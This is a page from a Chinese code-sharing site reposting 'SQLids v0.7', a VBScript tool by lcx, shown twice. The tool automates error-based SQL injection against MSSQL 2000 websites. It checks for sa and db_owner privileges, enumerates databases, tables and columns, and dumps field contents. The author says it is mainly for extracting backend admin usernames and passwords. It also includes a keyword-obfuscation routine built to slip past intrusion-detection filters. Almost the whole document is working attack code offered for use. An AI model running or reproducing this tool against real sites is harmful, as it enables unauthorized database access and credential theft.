SQLids.vbs 0.7(最终版,以后改成gui界面的)
程序员文章站
2024-01-07 11:00:46
是有这个问题的。第一,应当用正则判断较好。第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够...
是有这个问题的。
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。
set arg=wscript.arguments
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.quit
end if
if arg.count=0 then
usage()
wscript.quit
end if
sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo "//www.jb51.net/article/14172.htm"
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
wsh.echo "usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search
pass"
wsh.echo string(79,"*")&vbcrlf
end sub
function gethttppage(path)
t = getbody(path)
gethttppage = bytestobstr(t, "gb2312")
end function
function urlencode(str)
str = replace(str," ","%20")
urlencode = str
end function
function getbody(url)' xml得到网页源码,可以改成cookie或get提交
on error resume next
aurl=split(url,"?") '这是为post提交的
set retrieval = createobject("microsoft.xmlhttp")
with retrieval
.open "post", aurl(0), false, "", ""
.setrequestheader "content-type", "application/x-www-form-urlencoded"
.setrequestheader "accept-encoding", "gzip, deflate"
.setrequestheader "user-agent", "mozilla/4.0 (compatible; msie 7.0; windows nt 6.0; slcc1; .net clr 2.0.50727; media center pc 5.0; .net clr
3.0.04506; .net clr 1.1.4322)"
.setrequestheader "connection", "keep-alive"
.setrequestheader "cache-control", "no-cache"
.send urlencode(aurl(1)) 'post提交
getbody = .responsebody
.abort
end with
set retrieval = nothing
end function
function bytestobstr(body, cset)
dim objstream
set objstream = createobject("adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.open
objstream.write body
objstream.position = 0
objstream.type = 2
objstream.charset = cset
bytestobstr = objstream.readtext
objstream.close
set objstream = nothing
end function
function replacekeyword(value)'绕过ids过虑
table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|next->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
dim i, relpacement, temp
relpacement = split(table, "|[k]|")
replacekeyword = value
for i = 0 to ubound(relpacement)
temp = split(relpacement(i), "->")
if ubound(temp) = 1 then replacekeyword = replace(replacekeyword, temp(0), temp(1))
next
end function
function result(shtmltemp) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会
ahtml = split(shtmltemp, "varchar")
if(ubound(ahtml) > 0)then
shtmltemp = ahtml(1)
ahtml = split(shtmltemp, "'")
shtmltemp = ahtml(1)
end if
result=shtmltemp
end function
function str2hex(strhex)'sql的16进制转换函数
dim shex
for i = 1 to len(strhex)
shex = shex & hex(asc(mid(strhex,i,1)))&"00"
next
str2hex = "0x"&shex
end function
function str2hextwo(strhex)'sql的16进制转换函数
dim shex
for i = 1 to len(strhex)
shex = shex & hex(asc(mid(strhex,i,1)))
next
str2hextwo = "0x"&shex
end function
function mover(rstr) '去重复
dim i,spstr
spstr = split(rstr,",")
for i = 0 to ubound(spstr)
if i = 0 then
mover = mover & spstr(i) & ","
else
if instr(mover,spstr(i))=0 and i=ubound(spstr) then
mover = mover & spstr(i)
elseif instr(mover,spstr(i))=0 then
mover = mover & spstr(i) & ","
end if
end if
next
end function
function page(sql)
page=replace(gethttppage(url&" "&replacekeyword(sql)),chr(34),"")
end function
url=arg(0)
injection =arg(1)
'--------------------------------------以下代码是注入语句,完全不需要引号
select case arg(1)
case "limit"
body=replace(gethttppage(url),chr(34),"")
'语句单独提出来,方便以后修改,第一条是sa,第二条是db_owner
sqlone="and (select is_srvrolemember(0x730079007300610064006d0069006e00))>0--"
sqltwo="and (select is_member(0x640062005f006f0077006e0065007200))>0--"
bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "当前信息:"
if len(body)=len(bodyone) then wsh.echo "sa"
if len(body)=len(bodytwo) and len(body)<>len(bodyone) then
wsh.echo "db_owner"
else
wsh.echo "public"
end if
sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name
case "dbname"
i=1
do
sql="and db_name("&i&")>0--" '暴库名语句
body = page(sql)
k=instrrev(body,"varchar", -1, 0)
i=i+1
if k<>0 then
wscript.echo result(body)
else
wsh.echo "========over============"
end if
loop until k=0
case "table"
i=1
do
' 表名语句 agr(2)表示库
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
body = page(sql)
k=instrrev(body,"varchar", -1, 0)
i=i+1
if k<>0 then
wscript.echo result(body)
else
wsh.echo "========over============"
end if
loop until k=0
case "filed"
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&str2hex(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=replace(biaoid,chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=replace(result(page(sqlclounmcnt)),chr(94),"")
wsh.echo "共有列名"&k&"个"
for i=1 to k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
next
case "result"
i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句
k=result(page(sqlcloum))
k=replace(k,chr(94),"")
wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
for i=1 to k
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
body = page(sqlneirong)
wscript.echo replace(result(body),chr(94),"")
next
case "search"
love=str2hextwo(arg(2))
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
timespend = timer
for i=1 to 10 '可以根据需要改动这个10
sqlsearch="and (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&i&"/* */object_name(id)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindex(cast("&love&"/* */as/* */varchar(2000)),name)%3e0/* */and/* */left(name,1)!=0x40/* */order/*
*/by/* */t_name/* */asc)/* */as/* */t/* */order/* */by/* */t_name/* */desc)>0--"
body = page(sqlsearch)
body=result(body)
a=a&body&","
next
timespend = round(timer - timespend,2)
wsh.echo mover(a)
wsh.echo "用时:" & timespend & "秒."
case else
if arg(1)<>"limit" or arg(1)<>"dbname" or arg(1)<>"search" or arg(1)<>"table" or arg(1)<>"filed" then
wscript.echo "注意参数"
usage()
end if
end select
第一,应当用正则判断较好。
第二,我用循环加返回结果大于30个长度就退出循环,我相信没有表名和字段名大于30个字母的,但是字段值有可能大于,这个地方解决的不够好。但是一般是用来查后台的管理员的用户名和密码,所以就放弃了。
复制代码 代码如下:
set arg=wscript.arguments
if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.quit
end if
if arg.count=0 then
usage()
wscript.quit
end if
sub usage()
wsh.echo string(79,"*")
wsh.echo "暂且只支持mssql显错模式,直接写url为数字型,写url'为字符型,url里有&请用双引号包含url"
wsh.echo "sqlids v0.7 for mssql2000 with error by lcx"
wsh.echo "以下两个脚本可互相参考"
wsh.echo "//www.jb51.net/article/14172.htm"
wsh.echo "http://hi.baidu.com/myvbscript/blog/item/5c9b29124a3fa55bf919b878.html"
wsh.echo "usage:"
wsh.echo "cscript "&wscript.scriptname&" url limit ||----------->得到当前权限"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 limit"
wsh.echo "cscript "&wscript.scriptname&" url dbname ||----------->得到全部库名"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 dbname"
wsh.echo "cscript "&wscript.scriptname&" url table 库名||-------->得到所给库的全部表名"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 table
master"
wsh.echo "cscript "&wscript.scriptname&" url filed 库名 表名 ||---------->得到所给库所给表的全部字段"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 filed master spt_server_info"
wsh.echo "cscript "&wscript.scriptname&" url result 字段名 库名 表名||--->得所给库、表、字段的字段值"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?
id=1 result id master sysinfo"
wsh.echo "cscript "&wscript.scriptname&" url search 你要查找的字段名||--->根据关键字查找字段"&vbcrlf&"ex:cscript sql.vbs http://ww.x.com/1.asp?id=1 search
pass"
wsh.echo string(79,"*")&vbcrlf
end sub
function gethttppage(path)
t = getbody(path)
gethttppage = bytestobstr(t, "gb2312")
end function
function urlencode(str)
str = replace(str," ","%20")
urlencode = str
end function
function getbody(url)' xml得到网页源码,可以改成cookie或get提交
on error resume next
aurl=split(url,"?") '这是为post提交的
set retrieval = createobject("microsoft.xmlhttp")
with retrieval
.open "post", aurl(0), false, "", ""
.setrequestheader "content-type", "application/x-www-form-urlencoded"
.setrequestheader "accept-encoding", "gzip, deflate"
.setrequestheader "user-agent", "mozilla/4.0 (compatible; msie 7.0; windows nt 6.0; slcc1; .net clr 2.0.50727; media center pc 5.0; .net clr
3.0.04506; .net clr 1.1.4322)"
.setrequestheader "connection", "keep-alive"
.setrequestheader "cache-control", "no-cache"
.send urlencode(aurl(1)) 'post提交
getbody = .responsebody
.abort
end with
set retrieval = nothing
end function
function bytestobstr(body, cset)
dim objstream
set objstream = createobject("adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.open
objstream.write body
objstream.position = 0
objstream.type = 2
objstream.charset = cset
bytestobstr = objstream.readtext
objstream.close
set objstream = nothing
end function
function replacekeyword(value)'绕过ids过虑
table = "select->se%lect|[k]|insert->in%sert|[k]|update->u%pdate|[k]|delete->dele%te|[k]|drop->dr%op|[k]|alter->al%ter|[k]|create->crea%te|[k]|inner->in%
ner|[k]|join->jo%in|[k]|from->fro%m|[k]|where->w%here|[k]|union->unio%n|[k]|group->grou%p|[k]|by->b%y|[k]|having->hav%ing|[k]|table->tab%le|[k]|shutdown-
>shu%tdown|[k]|kill->k%ill|[k]|declare->dec%lare|[k]|open->o%pen|[k]|pwdencrypt->pwdencr%ypt|[k]|msdasql->m%sdasql|[k]|sqloledb->sqlo%ledb|[k]|char->c%har|
[k]|fetch->fe%tch|[k]|next->ne%xt|[k]|allocate->al%locate|[k]|sys->s%ys|[k]|raiserror->raiser%ror|[k]|exec->e%xec|[k]|=!->=%!|[k]|--->-%-|[k]|xp_->x%p_|[k]
|sp_->s%p_|[k]|and->a%nd"
dim i, relpacement, temp
relpacement = split(table, "|[k]|")
replacekeyword = value
for i = 0 to ubound(relpacement)
temp = split(relpacement(i), "->")
if ubound(temp) = 1 then replacekeyword = replace(replacekeyword, temp(0), temp(1))
next
end function
function result(shtmltemp) '用varchar做关键字分隔网页内容,用正则帅一点,可惜不太会
ahtml = split(shtmltemp, "varchar")
if(ubound(ahtml) > 0)then
shtmltemp = ahtml(1)
ahtml = split(shtmltemp, "'")
shtmltemp = ahtml(1)
end if
result=shtmltemp
end function
function str2hex(strhex)'sql的16进制转换函数
dim shex
for i = 1 to len(strhex)
shex = shex & hex(asc(mid(strhex,i,1)))&"00"
next
str2hex = "0x"&shex
end function
function str2hextwo(strhex)'sql的16进制转换函数
dim shex
for i = 1 to len(strhex)
shex = shex & hex(asc(mid(strhex,i,1)))
next
str2hextwo = "0x"&shex
end function
function mover(rstr) '去重复
dim i,spstr
spstr = split(rstr,",")
for i = 0 to ubound(spstr)
if i = 0 then
mover = mover & spstr(i) & ","
else
if instr(mover,spstr(i))=0 and i=ubound(spstr) then
mover = mover & spstr(i)
elseif instr(mover,spstr(i))=0 then
mover = mover & spstr(i) & ","
end if
end if
next
end function
function page(sql)
page=replace(gethttppage(url&" "&replacekeyword(sql)),chr(34),"")
end function
url=arg(0)
injection =arg(1)
'--------------------------------------以下代码是注入语句,完全不需要引号
select case arg(1)
case "limit"
body=replace(gethttppage(url),chr(34),"")
'语句单独提出来,方便以后修改,第一条是sa,第二条是db_owner
sqlone="and (select is_srvrolemember(0x730079007300610064006d0069006e00))>0--"
sqltwo="and (select is_member(0x640062005f006f0077006e0065007200))>0--"
bodyone=page(sqlone)
bodytwo=page(sqltwo)
wsh.echo "当前信息:"
if len(body)=len(bodyone) then wsh.echo "sa"
if len(body)=len(bodytwo) and len(body)<>len(bodyone) then
wsh.echo "db_owner"
else
wsh.echo "public"
end if
sqlthtree="and @@servername>0--|and @@version>0--|and user>0--|and db_name()>0--"
rtemp=split(sqlthtree,"|")
servername=result(page(rtemp(0)))
version=result(page(rtemp(1)))
user=result(page(rtemp(2)))
db_name=result(page(rtemp(3)))
wsh.echo "servername:"&servername
wsh.echo "version:"&version
wsh.echo "user:"& user
wsh.echo "db_name:"& db_name
case "dbname"
i=1
do
sql="and db_name("&i&")>0--" '暴库名语句
body = page(sql)
k=instrrev(body,"varchar", -1, 0)
i=i+1
if k<>0 then
wscript.echo result(body)
else
wsh.echo "========over============"
end if
loop until k=0
case "table"
i=1
do
' 表名语句 agr(2)表示库
sql="and 0<>(select top 1 name from "&arg(2)&".dbo.sysobjects where xtype=0x7500 and name not in (select top "& i &" name from "&arg(2)&".dbo.sysobjects
where xtype=0x7500))--"
body = page(sql)
k=instrrev(body,"varchar", -1, 0)
i=i+1
if k<>0 then
wscript.echo result(body)
else
wsh.echo "========over============"
end if
loop until k=0
case "filed"
sqlbiaoid="an%d (se%l%e%c%t to%p 1 ca%st(id as nvarch%ar(20))%2bch%ar(124) fr%om ["&arg(2)&"]..[sy%sob%je%cts] wh%ere name="&str2hex(arg(3))&")=0--
"
biaoid=result(page(sqlbiaoid))
biaoid=replace(biaoid,chr(124),"")
sqlclounmcnt="an%d (se%l%e%c%t ca%st(co%unt(1) as varch%ar(10))%2bch%ar(94) fr%om ["&arg(2)&"]..[sys%columns] wh%ere id="&biaoid&")=0-- "
k=replace(result(page(sqlclounmcnt)),chr(94),"")
wsh.echo "共有列名"&k&"个"
for i=1 to k
sqlfiled=" an%d (se%l%e%c%t to%p 1 ca%st(name as varch%ar(8000)) fr%om (se%l%e%c%t to%p "&i&" colid,name fr%om ["&arg(2)&"]..[sys%columns] wh%ere
id="&biaoid&" order by colid) t order by colid desc)=0--"
wsh.echo result(page(sqlfiled))
next
case "result"
i=1
sqlcloum="and (select cast(count(1) as varch%ar(8000))%2bchar(94) from ["&arg(3)&"]..["&arg(4)&"] where 1=1)>0--" '暴列的总数目语句
k=result(page(sqlcloum))
k=replace(k,chr(94),"")
wsh.echo arg(2)&"字段共有记录数"&k&"个"&vbcrlf
for i=1 to k
sqlneirong= "an%d (se%l%e%c%t to%p 1 ca%st("&arg(2)&" as varch%ar)%2bch%ar(94) fr%om (se%l%e%c%t to%p "&i&" ["&arg(2)&"] fr%om ["&arg(3)&"]..["&arg(4)
&"] wh%ere 1=1 order by ["&arg(2)&"]) t wh%ere 1=1 order by ["&arg(2)&"] desc )=0--"
body = page(sqlneirong)
wscript.echo replace(result(body),chr(94),"")
next
case "search"
love=str2hextwo(arg(2))
wscript.echo "请稍候,正在查循,暂且只列10条,结果显示为'表名|字段名'格式"
timespend = timer
for i=1 to 10 '可以根据需要改动这个10
sqlsearch="and (select/* */top/* */1/* */t_name%2bchar(124)%2bc_name/* */from/* */(select/* */top/* */"&i&"/* */object_name(id)/* */as/* */t_name,name/*
*/as/* */c_name/* */from/* */syscolumns/* */where/* */charindex(cast("&love&"/* */as/* */varchar(2000)),name)%3e0/* */and/* */left(name,1)!=0x40/* */order/*
*/by/* */t_name/* */asc)/* */as/* */t/* */order/* */by/* */t_name/* */desc)>0--"
body = page(sqlsearch)
body=result(body)
a=a&body&","
next
timespend = round(timer - timespend,2)
wsh.echo mover(a)
wsh.echo "用时:" & timespend & "秒."
case else
if arg(1)<>"limit" or arg(1)<>"dbname" or arg(1)<>"search" or arg(1)<>"table" or arg(1)<>"filed" then
wscript.echo "注意参数"
usage()
end if
end select